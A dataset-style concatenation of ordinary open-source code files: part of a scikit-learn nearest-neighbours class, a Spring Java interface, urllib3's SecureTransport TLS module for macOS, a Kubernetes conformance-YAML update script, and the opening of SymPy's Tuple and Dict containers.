(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
metric to use for distance computation. Any metric from scikit-learn
or scipy.spatial.distance can be used.
If metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays as input and return one value indicating the
distance between them. This works for Scipy's metrics, but is less
efficient than passing the metric name as a string.
Distance matrices are not supported.
Valid values for metric are:
- from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']
- from scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',
'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',
'sqeuclidean', 'yule']
See the documentation for scipy.spatial.distance for details on these
metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Affects only :meth:`k_neighbors` and :meth:`kneighbors_graph` methods.
Examples
--------
>>> import numpy as np
>>> from sklearn.neighbors import NearestNeighbors
>>> samples = [[0, 0, 2], [1, 0, 0], [0, 0, 1]]
>>> neigh = NearestNeighbors(2, 0.4)
>>> neigh.fit(samples) #doctest: +ELLIPSIS
NearestNeighbors(...)
>>> neigh.kneighbors([[0, 0, 1.3]], 2, return_distance=False)
... #doctest: +ELLIPSIS
array([[2, 0]]...)
>>> rng = neigh.radius_neighbors([0, 0, 1.3], 0.4, return_distance=False)
>>> np.asarray(rng[0][0])
array(2)
See also
--------
KNeighborsClassifier
RadiusNeighborsClassifier
KNeighborsRegressor
RadiusNeighborsRegressor
BallTree
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
http://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, radius=1.0,
algorithm='auto', leaf_size=30, metric='minkowski',
p=2, metric_params=None, n_jobs=1, **kwargs):
self._init_params(n_neighbors=n_neighbors,
radius=radius,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params, n_jobs=n_jobs, **kwargs) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.beans.factory.xml;
import org.jspecify.annotations.Nullable;
/**
* Used by the {@link org.springframework.beans.factory.xml.DefaultBeanDefinitionDocumentReader} to
* locate a {@link NamespaceHandler} implementation for a particular namespace URI.
*
* @author Rob Harrop
* @since 2.0
* @see NamespaceHandler
* @see org.springframework.beans.factory.xml.DefaultBeanDefinitionDocumentReader
*/
@FunctionalInterface
public interface NamespaceHandlerResolver {
/**
* Resolve the namespace URI and return the located {@link NamespaceHandler}
* implementation.
* @param namespaceUri the relevant namespace URI
* @return the located {@link NamespaceHandler} (may be {@code null})
*/
@Nullable NamespaceHandler resolve(String namespaceUri);
} | java | github | https://github.com/spring-projects/spring-framework | spring-beans/src/main/java/org/springframework/beans/factory/xml/NamespaceHandlerResolver.java |
"""
SecureTranport support for urllib3 via ctypes.
This makes platform-native TLS available to urllib3 users on macOS without the
use of a compiler. This is an important feature because the Python Package
Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL
that ships with macOS is not capable of doing TLSv1.2. The only way to resolve
this is to give macOS users an alternative solution to the problem, and that
solution is to use SecureTransport.
We use ctypes here because this solution must not require a compiler. That's
because pip is not allowed to require a compiler either.
This is not intended to be a seriously long-term solution to this problem.
The hope is that PEP 543 will eventually solve this issue for us, at which
point we can retire this contrib module. But in the short term, we need to
solve the impending tire fire that is Python on Mac without this kind of
contrib module. So...here we are.
To use this module, simply import and inject it::
import urllib3.contrib.securetransport
urllib3.contrib.securetransport.inject_into_urllib3()
Happy TLSing!
"""
from __future__ import absolute_import
import contextlib
import ctypes
import errno
import os.path
import shutil
import socket
import ssl
import threading
import weakref
from .. import util
from ._securetransport.bindings import (
Security, SecurityConst, CoreFoundation
)
from ._securetransport.low_level import (
_assert_no_error, _cert_array_from_pem, _temporary_keychain,
_load_client_cert_chain
)
try: # Platform-specific: Python 2
from socket import _fileobject
except ImportError: # Platform-specific: Python 3
_fileobject = None
from ..packages.backports.makefile import backport_makefile
try:
memoryview(b'')
except NameError:
raise ImportError("SecureTransport only works on Pythons with memoryview")
__all__ = ['inject_into_urllib3', 'extract_from_urllib3']
# SNI always works
HAS_SNI = True
orig_util_HAS_SNI = util.HAS_SNI
orig_util_SSLContext = util.ssl_.SSLContext
# This dictionary is used by the read callback to obtain a handle to the
# calling wrapped socket. This is a pretty silly approach, but for now it'll
# do. I feel like I should be able to smuggle a handle to the wrapped socket
# directly in the SSLConnectionRef, but for now this approach will work I
# guess.
#
# We need to lock around this structure for inserts, but we don't do it for
# reads/writes in the callbacks. The reasoning here goes as follows:
#
# 1. It is not possible to call into the callbacks before the dictionary is
# populated, so once in the callback the id must be in the dictionary.
# 2. The callbacks don't mutate the dictionary, they only read from it, and
# so cannot conflict with any of the insertions.
#
# This is good: if we had to lock in the callbacks we'd drastically slow down
# the performance of this code.
_connection_refs = weakref.WeakValueDictionary()
_connection_ref_lock = threading.Lock()
# Limit writes to 16kB. This is OpenSSL's limit, but we'll cargo-cult it over
# for no better reason than we need *a* limit, and this one is right there.
SSL_WRITE_BLOCKSIZE = 16384
# This is our equivalent of util.ssl_.DEFAULT_CIPHERS, but expanded out to
# individual cipher suites. We need to do this becuase this is how
# SecureTransport wants them.
CIPHER_SUITES = [
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
SecurityConst.TLS_DHE_DSS_WITH_AES_256_GCM_SHA384,
SecurityConst.TLS_DHE_RSA_WITH_AES_256_GCM_SHA384,
SecurityConst.TLS_DHE_DSS_WITH_AES_128_GCM_SHA256,
SecurityConst.TLS_DHE_RSA_WITH_AES_128_GCM_SHA256,
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384,
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,
SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA256,
SecurityConst.TLS_DHE_DSS_WITH_AES_256_CBC_SHA256,
SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA,
SecurityConst.TLS_DHE_DSS_WITH_AES_256_CBC_SHA,
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256,
SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,
SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,
SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA256,
SecurityConst.TLS_DHE_DSS_WITH_AES_128_CBC_SHA256,
SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,
SecurityConst.TLS_DHE_DSS_WITH_AES_128_CBC_SHA,
SecurityConst.TLS_RSA_WITH_AES_256_GCM_SHA384,
SecurityConst.TLS_RSA_WITH_AES_128_GCM_SHA256,
SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA256,
SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA256,
SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA,
SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA,
]
# Basically this is simple: for PROTOCOL_SSLv23 we turn it into a low of
# TLSv1 and a high of TLSv1.2. For everything else, we pin to that version.
_protocol_to_min_max = {
ssl.PROTOCOL_SSLv23: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12),
}
if hasattr(ssl, "PROTOCOL_SSLv2"):
_protocol_to_min_max[ssl.PROTOCOL_SSLv2] = (
SecurityConst.kSSLProtocol2, SecurityConst.kSSLProtocol2
)
if hasattr(ssl, "PROTOCOL_SSLv3"):
_protocol_to_min_max[ssl.PROTOCOL_SSLv3] = (
SecurityConst.kSSLProtocol3, SecurityConst.kSSLProtocol3
)
if hasattr(ssl, "PROTOCOL_TLSv1"):
_protocol_to_min_max[ssl.PROTOCOL_TLSv1] = (
SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol1
)
if hasattr(ssl, "PROTOCOL_TLSv1_1"):
_protocol_to_min_max[ssl.PROTOCOL_TLSv1_1] = (
SecurityConst.kTLSProtocol11, SecurityConst.kTLSProtocol11
)
if hasattr(ssl, "PROTOCOL_TLSv1_2"):
_protocol_to_min_max[ssl.PROTOCOL_TLSv1_2] = (
SecurityConst.kTLSProtocol12, SecurityConst.kTLSProtocol12
)
if hasattr(ssl, "PROTOCOL_TLS"):
_protocol_to_min_max[ssl.PROTOCOL_TLS] = _protocol_to_min_max[ssl.PROTOCOL_SSLv23]
def inject_into_urllib3():
"""
Monkey-patch urllib3 with SecureTransport-backed SSL-support.
"""
util.ssl_.SSLContext = SecureTransportContext
util.HAS_SNI = HAS_SNI
util.ssl_.HAS_SNI = HAS_SNI
util.IS_SECURETRANSPORT = True
util.ssl_.IS_SECURETRANSPORT = True
def extract_from_urllib3():
"""
Undo monkey-patching by :func:`inject_into_urllib3`.
"""
util.ssl_.SSLContext = orig_util_SSLContext
util.HAS_SNI = orig_util_HAS_SNI
util.ssl_.HAS_SNI = orig_util_HAS_SNI
util.IS_SECURETRANSPORT = False
util.ssl_.IS_SECURETRANSPORT = False
def _read_callback(connection_id, data_buffer, data_length_pointer):
"""
SecureTransport read callback. This is called by ST to request that data
be returned from the socket.
"""
wrapped_socket = None
try:
wrapped_socket = _connection_refs.get(connection_id)
if wrapped_socket is None:
return SecurityConst.errSSLInternal
base_socket = wrapped_socket.socket
requested_length = data_length_pointer[0]
timeout = wrapped_socket.gettimeout()
error = None
read_count = 0
buffer = (ctypes.c_char * requested_length).from_address(data_buffer)
buffer_view = memoryview(buffer)
try:
while read_count < requested_length:
if timeout is None or timeout >= 0:
readables = util.wait_for_read([base_socket], timeout)
if not readables:
raise socket.error(errno.EAGAIN, 'timed out')
# We need to tell ctypes that we have a buffer that can be
# written to. Upsettingly, we do that like this:
chunk_size = base_socket.recv_into(
buffer_view[read_count:requested_length]
)
read_count += chunk_size
if not chunk_size:
if not read_count:
return SecurityConst.errSSLClosedGraceful
break
except (socket.error) as e:
error = e.errno
if error is not None and error != errno.EAGAIN:
if error == errno.ECONNRESET:
return SecurityConst.errSSLClosedAbort
raise
data_length_pointer[0] = read_count
if read_count != requested_length:
return SecurityConst.errSSLWouldBlock
return 0
except Exception as e:
if wrapped_socket is not None:
wrapped_socket._exception = e
return SecurityConst.errSSLInternal
def _write_callback(connection_id, data_buffer, data_length_pointer):
"""
SecureTransport write callback. This is called by ST to request that data
actually be sent on the network.
"""
wrapped_socket = None
try:
wrapped_socket = _connection_refs.get(connection_id)
if wrapped_socket is None:
return SecurityConst.errSSLInternal
base_socket = wrapped_socket.socket
bytes_to_write = data_length_pointer[0]
data = ctypes.string_at(data_buffer, bytes_to_write)
timeout = wrapped_socket.gettimeout()
error = None
sent = 0
try:
while sent < bytes_to_write:
if timeout is None or timeout >= 0:
writables = util.wait_for_write([base_socket], timeout)
if not writables:
raise socket.error(errno.EAGAIN, 'timed out')
chunk_sent = base_socket.send(data)
sent += chunk_sent
# This has some needless copying here, but I'm not sure there's
# much value in optimising this data path.
data = data[chunk_sent:]
except (socket.error) as e:
error = e.errno
if error is not None and error != errno.EAGAIN:
if error == errno.ECONNRESET:
return SecurityConst.errSSLClosedAbort
raise
data_length_pointer[0] = sent
if sent != bytes_to_write:
return SecurityConst.errSSLWouldBlock
return 0
except Exception as e:
if wrapped_socket is not None:
wrapped_socket._exception = e
return SecurityConst.errSSLInternal
# We need to keep these two objects references alive: if they get GC'd while
# in use then SecureTransport could attempt to call a function that is in freed
# memory. That would be...uh...bad. Yeah, that's the word. Bad.
_read_callback_pointer = Security.SSLReadFunc(_read_callback)
_write_callback_pointer = Security.SSLWriteFunc(_write_callback)
class WrappedSocket(object):
"""
API-compatibility wrapper for Python's OpenSSL wrapped socket object.
Note: _makefile_refs, _drop(), and _reuse() are needed for the garbage
collector of PyPy.
"""
def __init__(self, socket):
self.socket = socket
self.context = None
self._makefile_refs = 0
self._closed = False
self._exception = None
self._keychain = None
self._keychain_dir = None
self._client_cert_chain = None
# We save off the previously-configured timeout and then set it to
# zero. This is done because we use select and friends to handle the
# timeouts, but if we leave the timeout set on the lower socket then
# Python will "kindly" call select on that socket again for us. Avoid
# that by forcing the timeout to zero.
self._timeout = self.socket.gettimeout()
self.socket.settimeout(0)
@contextlib.contextmanager
def _raise_on_error(self):
"""
A context manager that can be used to wrap calls that do I/O from
SecureTransport. If any of the I/O callbacks hit an exception, this
context manager will correctly propagate the exception after the fact.
This avoids silently swallowing those exceptions.
It also correctly forces the socket closed.
"""
self._exception = None
# We explicitly don't catch around this yield because in the unlikely
# event that an exception was hit in the block we don't want to swallow
# it.
yield
if self._exception is not None:
exception, self._exception = self._exception, None
self.close()
raise exception
def _set_ciphers(self):
"""
Sets up the allowed ciphers. By default this matches the set in
util.ssl_.DEFAULT_CIPHERS, at least as supported by macOS. This is done
custom and doesn't allow changing at this time, mostly because parsing
OpenSSL cipher strings is going to be a freaking nightmare.
"""
ciphers = (Security.SSLCipherSuite * len(CIPHER_SUITES))(*CIPHER_SUITES)
result = Security.SSLSetEnabledCiphers(
self.context, ciphers, len(CIPHER_SUITES)
)
_assert_no_error(result)
def _custom_validate(self, verify, trust_bundle):
"""
Called when we have set custom validation. We do this in two cases:
first, when cert validation is entirely disabled; and second, when
using a custom trust DB.
"""
# If we disabled cert validation, just say: cool.
if not verify:
return
# We want data in memory, so load it up.
if os.path.isfile(trust_bundle):
with open(trust_bundle, 'rb') as f:
trust_bundle = f.read()
cert_array = None
trust = Security.SecTrustRef()
try:
# Get a CFArray that contains the certs we want.
cert_array = _cert_array_from_pem(trust_bundle)
# Ok, now the hard part. We want to get the SecTrustRef that ST has
# created for this connection, shove our CAs into it, tell ST to
# ignore everything else it knows, and then ask if it can build a
# chain. This is a buuuunch of code.
result = Security.SSLCopyPeerTrust(
self.context, ctypes.byref(trust)
)
_assert_no_error(result)
if not trust:
raise ssl.SSLError("Failed to copy trust reference")
result = Security.SecTrustSetAnchorCertificates(trust, cert_array)
_assert_no_error(result)
result = Security.SecTrustSetAnchorCertificatesOnly(trust, True)
_assert_no_error(result)
trust_result = Security.SecTrustResultType()
result = Security.SecTrustEvaluate(
trust, ctypes.byref(trust_result)
)
_assert_no_error(result)
finally:
if trust:
CoreFoundation.CFRelease(trust)
if cert_array is None:
CoreFoundation.CFRelease(cert_array)
# Ok, now we can look at what the result was.
successes = (
SecurityConst.kSecTrustResultUnspecified,
SecurityConst.kSecTrustResultProceed
)
if trust_result.value not in successes:
raise ssl.SSLError(
"certificate verify failed, error code: %d" %
trust_result.value
)
def handshake(self,
server_hostname,
verify,
trust_bundle,
min_version,
max_version,
client_cert,
client_key,
client_key_passphrase):
"""
Actually performs the TLS handshake. This is run automatically by
wrapped socket, and shouldn't be needed in user code.
"""
# First, we do the initial bits of connection setup. We need to create
# a context, set its I/O funcs, and set the connection reference.
self.context = Security.SSLCreateContext(
None, SecurityConst.kSSLClientSide, SecurityConst.kSSLStreamType
)
result = Security.SSLSetIOFuncs(
self.context, _read_callback_pointer, _write_callback_pointer
)
_assert_no_error(result)
# Here we need to compute the handle to use. We do this by taking the
# id of self modulo 2**31 - 1. If this is already in the dictionary, we
# just keep incrementing by one until we find a free space.
with _connection_ref_lock:
handle = id(self) % 2147483647
while handle in _connection_refs:
handle = (handle + 1) % 2147483647
_connection_refs[handle] = self
result = Security.SSLSetConnection(self.context, handle)
_assert_no_error(result)
# If we have a server hostname, we should set that too.
if server_hostname:
if not isinstance(server_hostname, bytes):
server_hostname = server_hostname.encode('utf-8')
result = Security.SSLSetPeerDomainName(
self.context, server_hostname, len(server_hostname)
)
_assert_no_error(result)
# Setup the ciphers.
self._set_ciphers()
# Set the minimum and maximum TLS versions.
result = Security.SSLSetProtocolVersionMin(self.context, min_version)
_assert_no_error(result)
result = Security.SSLSetProtocolVersionMax(self.context, max_version)
_assert_no_error(result)
# If there's a trust DB, we need to use it. We do that by telling
# SecureTransport to break on server auth. We also do that if we don't
# want to validate the certs at all: we just won't actually do any
# authing in that case.
if not verify or trust_bundle is not None:
result = Security.SSLSetSessionOption(
self.context,
SecurityConst.kSSLSessionOptionBreakOnServerAuth,
True
)
_assert_no_error(result)
# If there's a client cert, we need to use it.
if client_cert:
self._keychain, self._keychain_dir = _temporary_keychain()
self._client_cert_chain = _load_client_cert_chain(
self._keychain, client_cert, client_key
)
result = Security.SSLSetCertificate(
self.context, self._client_cert_chain
)
_assert_no_error(result)
while True:
with self._raise_on_error():
result = Security.SSLHandshake(self.context)
if result == SecurityConst.errSSLWouldBlock:
raise socket.timeout("handshake timed out")
elif result == SecurityConst.errSSLServerAuthCompleted:
self._custom_validate(verify, trust_bundle)
continue
else:
_assert_no_error(result)
break
def fileno(self):
return self.socket.fileno()
# Copy-pasted from Python 3.5 source code
def _decref_socketios(self):
if self._makefile_refs > 0:
self._makefile_refs -= 1
if self._closed:
self.close()
def recv(self, bufsiz):
buffer = ctypes.create_string_buffer(bufsiz)
bytes_read = self.recv_into(buffer, bufsiz)
data = buffer[:bytes_read]
return data
def recv_into(self, buffer, nbytes=None):
# Read short on EOF.
if self._closed:
return 0
if nbytes is None:
nbytes = len(buffer)
buffer = (ctypes.c_char * nbytes).from_buffer(buffer)
processed_bytes = ctypes.c_size_t(0)
with self._raise_on_error():
result = Security.SSLRead(
self.context, buffer, nbytes, ctypes.byref(processed_bytes)
)
# There are some result codes that we want to treat as "not always
# errors". Specifically, those are errSSLWouldBlock,
# errSSLClosedGraceful, and errSSLClosedNoNotify.
if (result == SecurityConst.errSSLWouldBlock):
# If we didn't process any bytes, then this was just a time out.
# However, we can get errSSLWouldBlock in situations when we *did*
# read some data, and in those cases we should just read "short"
# and return.
if processed_bytes.value == 0:
# Timed out, no data read.
raise socket.timeout("recv timed out")
elif result in (SecurityConst.errSSLClosedGraceful, SecurityConst.errSSLClosedNoNotify):
# The remote peer has closed this connection. We should do so as
# well. Note that we don't actually return here because in
# principle this could actually be fired along with return data.
# It's unlikely though.
self.close()
else:
_assert_no_error(result)
# Ok, we read and probably succeeded. We should return whatever data
# was actually read.
return processed_bytes.value
def settimeout(self, timeout):
self._timeout = timeout
def gettimeout(self):
return self._timeout
def send(self, data):
processed_bytes = ctypes.c_size_t(0)
with self._raise_on_error():
result = Security.SSLWrite(
self.context, data, len(data), ctypes.byref(processed_bytes)
)
if result == SecurityConst.errSSLWouldBlock and processed_bytes.value == 0:
# Timed out
raise socket.timeout("send timed out")
else:
_assert_no_error(result)
# We sent, and probably succeeded. Tell them how much we sent.
return processed_bytes.value
def sendall(self, data):
total_sent = 0
while total_sent < len(data):
sent = self.send(data[total_sent:total_sent + SSL_WRITE_BLOCKSIZE])
total_sent += sent
def shutdown(self):
with self._raise_on_error():
Security.SSLClose(self.context)
def close(self):
# TODO: should I do clean shutdown here? Do I have to?
if self._makefile_refs < 1:
self._closed = True
if self.context:
CoreFoundation.CFRelease(self.context)
self.context = None
if self._client_cert_chain:
CoreFoundation.CFRelease(self._client_cert_chain)
self._client_cert_chain = None
if self._keychain:
Security.SecKeychainDelete(self._keychain)
CoreFoundation.CFRelease(self._keychain)
shutil.rmtree(self._keychain_dir)
self._keychain = self._keychain_dir = None
return self.socket.close()
else:
self._makefile_refs -= 1
def getpeercert(self, binary_form=False):
# Urgh, annoying.
#
# Here's how we do this:
#
# 1. Call SSLCopyPeerTrust to get hold of the trust object for this
# connection.
# 2. Call SecTrustGetCertificateAtIndex for index 0 to get the leaf.
# 3. To get the CN, call SecCertificateCopyCommonName and process that
# string so that it's of the appropriate type.
# 4. To get the SAN, we need to do something a bit more complex:
# a. Call SecCertificateCopyValues to get the data, requesting
# kSecOIDSubjectAltName.
# b. Mess about with this dictionary to try to get the SANs out.
#
# This is gross. Really gross. It's going to be a few hundred LoC extra
# just to repeat something that SecureTransport can *already do*. So my
# operating assumption at this time is that what we want to do is
# instead to just flag to urllib3 that it shouldn't do its own hostname
# validation when using SecureTransport.
if not binary_form:
raise ValueError(
"SecureTransport only supports dumping binary certs"
)
trust = Security.SecTrustRef()
certdata = None
der_bytes = None
try:
# Grab the trust store.
result = Security.SSLCopyPeerTrust(
self.context, ctypes.byref(trust)
)
_assert_no_error(result)
if not trust:
# Probably we haven't done the handshake yet. No biggie.
return None
cert_count = Security.SecTrustGetCertificateCount(trust)
if not cert_count:
# Also a case that might happen if we haven't handshaked.
# Handshook? Handshaken?
return None
leaf = Security.SecTrustGetCertificateAtIndex(trust, 0)
assert leaf
# Ok, now we want the DER bytes.
certdata = Security.SecCertificateCopyData(leaf)
assert certdata
data_length = CoreFoundation.CFDataGetLength(certdata)
data_buffer = CoreFoundation.CFDataGetBytePtr(certdata)
der_bytes = ctypes.string_at(data_buffer, data_length)
finally:
if certdata:
CoreFoundation.CFRelease(certdata)
if trust:
CoreFoundation.CFRelease(trust)
return der_bytes
def _reuse(self):
self._makefile_refs += 1
def _drop(self):
if self._makefile_refs < 1:
self.close()
else:
self._makefile_refs -= 1
if _fileobject: # Platform-specific: Python 2
def makefile(self, mode, bufsize=-1):
self._makefile_refs += 1
return _fileobject(self, mode, bufsize, close=True)
else: # Platform-specific: Python 3
def makefile(self, mode="r", buffering=None, *args, **kwargs):
# We disable buffering with SecureTransport because it conflicts with
# the buffering that ST does internally (see issue #1153 for more).
buffering = 0
return backport_makefile(self, mode, buffering, *args, **kwargs)
WrappedSocket.makefile = makefile
class SecureTransportContext(object):
"""
I am a wrapper class for the SecureTransport library, to translate the
interface of the standard library ``SSLContext`` object to calls into
SecureTransport.
"""
def __init__(self, protocol):
self._min_version, self._max_version = _protocol_to_min_max[protocol]
self._options = 0
self._verify = False
self._trust_bundle = None
self._client_cert = None
self._client_key = None
self._client_key_passphrase = None
@property
def check_hostname(self):
"""
SecureTransport cannot have its hostname checking disabled. For more,
see the comment on getpeercert() in this file.
"""
return True
@check_hostname.setter
def check_hostname(self, value):
"""
SecureTransport cannot have its hostname checking disabled. For more,
see the comment on getpeercert() in this file.
"""
pass
@property
def options(self):
# TODO: Well, crap.
#
# So this is the bit of the code that is the most likely to cause us
# trouble. Essentially we need to enumerate all of the SSL options that
# users might want to use and try to see if we can sensibly translate
# them, or whether we should just ignore them.
return self._options
@options.setter
def options(self, value):
# TODO: Update in line with above.
self._options = value
@property
def verify_mode(self):
return ssl.CERT_REQUIRED if self._verify else ssl.CERT_NONE
@verify_mode.setter
def verify_mode(self, value):
self._verify = True if value == ssl.CERT_REQUIRED else False
def set_default_verify_paths(self):
# So, this has to do something a bit weird. Specifically, what it does
# is nothing.
#
# This means that, if we had previously had load_verify_locations
# called, this does not undo that. We need to do that because it turns
# out that the rest of the urllib3 code will attempt to load the
# default verify paths if it hasn't been told about any paths, even if
# the context itself was sometime earlier. We resolve that by just
# ignoring it.
pass
def load_default_certs(self):
return self.set_default_verify_paths()
def set_ciphers(self, ciphers):
# For now, we just require the default cipher string.
if ciphers != util.ssl_.DEFAULT_CIPHERS:
raise ValueError(
"SecureTransport doesn't support custom cipher strings"
)
def load_verify_locations(self, cafile=None, capath=None, cadata=None):
# OK, we only really support cadata and cafile.
if capath is not None:
raise ValueError(
"SecureTransport does not support cert directories"
)
self._trust_bundle = cafile or cadata
def load_cert_chain(self, certfile, keyfile=None, password=None):
self._client_cert = certfile
self._client_key = keyfile
self._client_cert_passphrase = password
def wrap_socket(self, sock, server_side=False,
do_handshake_on_connect=True, suppress_ragged_eofs=True,
server_hostname=None):
# So, what do we do here? Firstly, we assert some properties. This is a
# stripped down shim, so there is some functionality we don't support.
# See PEP 543 for the real deal.
assert not server_side
assert do_handshake_on_connect
assert suppress_ragged_eofs
# Ok, we're good to go. Now we want to create the wrapped socket object
# and store it in the appropriate place.
wrapped_socket = WrappedSocket(sock)
# Now we can handshake
wrapped_socket.handshake(
server_hostname, self._verify, self._trust_bundle,
self._min_version, self._max_version, self._client_cert,
self._client_key, self._client_key_passphrase
)
return wrapped_socket | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env bash
# Copyright 2021 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
KUBE_ROOT=$(dirname "${BASH_SOURCE[0]}")/..
cd "${KUBE_ROOT}"
# generate json spec -> yaml
test/conformance/gen-conformance-yaml.sh
# replace checked-in yaml
cp _output/conformance.yaml test/conformance/testdata/conformance.yaml | unknown | github | https://github.com/kubernetes/kubernetes | hack/update-conformance-yaml.sh |
"""Module for SymPy containers
(SymPy objects that store other SymPy objects)
The containers implemented in this module are subclassed to Basic.
They are supposed to work seamlessly within the SymPy framework.
"""
from __future__ import print_function, division
from sympy.core.basic import Basic
from sympy.core.sympify import sympify, converter
from sympy.utilities.iterables import iterable
class Tuple(Basic):
"""
Wrapper around the builtin tuple object
The Tuple is a subclass of Basic, so that it works well in the
SymPy framework. The wrapped tuple is available as self.args, but
you can also access elements or slices with [:] syntax.
>>> from sympy import symbols
>>> from sympy.core.containers import Tuple
>>> a, b, c, d = symbols('a b c d')
>>> Tuple(a, b, c)[1:]
(b, c)
>>> Tuple(a, b, c).subs(a, d)
(d, b, c)
"""
def __new__(cls, *args, **assumptions):
args = [ sympify(arg) for arg in args ]
obj = Basic.__new__(cls, *args, **assumptions)
return obj
def __getitem__(self, i):
if isinstance(i, slice):
indices = i.indices(len(self))
return Tuple(*[self.args[j] for j in range(*indices)])
return self.args[i]
def __len__(self):
return len(self.args)
def __contains__(self, item):
return item in self.args
def __iter__(self):
return iter(self.args)
def __add__(self, other):
if isinstance(other, Tuple):
return Tuple(*(self.args + other.args))
elif isinstance(other, tuple):
return Tuple(*(self.args + other))
else:
return NotImplemented
def __radd__(self, other):
if isinstance(other, Tuple):
return Tuple(*(other.args + self.args))
elif isinstance(other, tuple):
return Tuple(*(other + self.args))
else:
return NotImplemented
def __eq__(self, other):
if isinstance(other, Basic):
return super(Tuple, self).__eq__(other)
return self.args == other
def __ne__(self, other):
if isinstance(other, Basic):
return super(Tuple, self).__ne__(other)
return self.args != other
def __hash__(self):
return hash(self.args)
def _to_mpmath(self, prec):
return tuple([a._to_mpmath(prec) for a in self.args])
def __lt__(self, other):
return self.args < other.args
def __le__(self, other):
return self.args <= other.args
# XXX: Basic defines count() as something different, so we can't
# redefine it here. Originally this lead to cse() test failure.
def tuple_count(self, value):
"""T.count(value) -> integer -- return number of occurrences of value"""
return self.args.count(value)
def index(self, value, start=None, stop=None):
"""T.index(value, [start, [stop]]) -> integer -- return first index of value.
Raises ValueError if the value is not present."""
# XXX: One would expect:
#
# return self.args.index(value, start, stop)
#
# here. Any trouble with that? Yes:
#
# >>> (1,).index(1, None, None)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# TypeError: slice indices must be integers or None or have an __index__ method
#
# See: http://bugs.python.org/issue13340
if start is None and stop is None:
return self.args.index(value)
elif stop is None:
return self.args.index(value, start)
else:
return self.args.index(value, start, stop)
converter[tuple] = lambda tup: Tuple(*tup)
def tuple_wrapper(method):
"""
Decorator that converts any tuple in the function arguments into a Tuple.
The motivation for this is to provide simple user interfaces. The user can
call a function with regular tuples in the argument, and the wrapper will
convert them to Tuples before handing them to the function.
>>> from sympy.core.containers import tuple_wrapper
>>> def f(*args):
... return args
>>> g = tuple_wrapper(f)
The decorated function g sees only the Tuple argument:
>>> g(0, (1, 2), 3)
(0, (1, 2), 3)
"""
def wrap_tuples(*args, **kw_args):
newargs = []
for arg in args:
if type(arg) is tuple:
newargs.append(Tuple(*arg))
else:
newargs.append(arg)
return method(*newargs, **kw_args)
return wrap_tuples
class Dict(Basic):
"""
Wrapper around the builtin dict object
The Dict is a subclass of Basic, so that it works well in the
SymPy framework. Because it is immutable, it may be included
in sets, but its values must all be given at instantiation and
cannot be changed afterwards. Otherwise it behaves identically
to the Python dict.
>>> from sympy.core.containers import Dict
>>> D = Dict({1: 'one', 2: 'two'})
>>> for key in D:
... if key == 1:
... print('%s %s' % (key, D[key]))
1 one
The args are sympified so the 1 and 2 are Integers and the values
are Symbols. Queries automatically sympify args so the following work:
>>> 1 in D
True
>>> D.has('one') # searches keys and values
True
>>> 'one' in D # not in the keys
False
>>> D[1]
one
"""
def __new__(cls, *args):
if len(args) == 1 and ((args[0].__class__ is dict) or
(args[0].__class__ is Dict)):
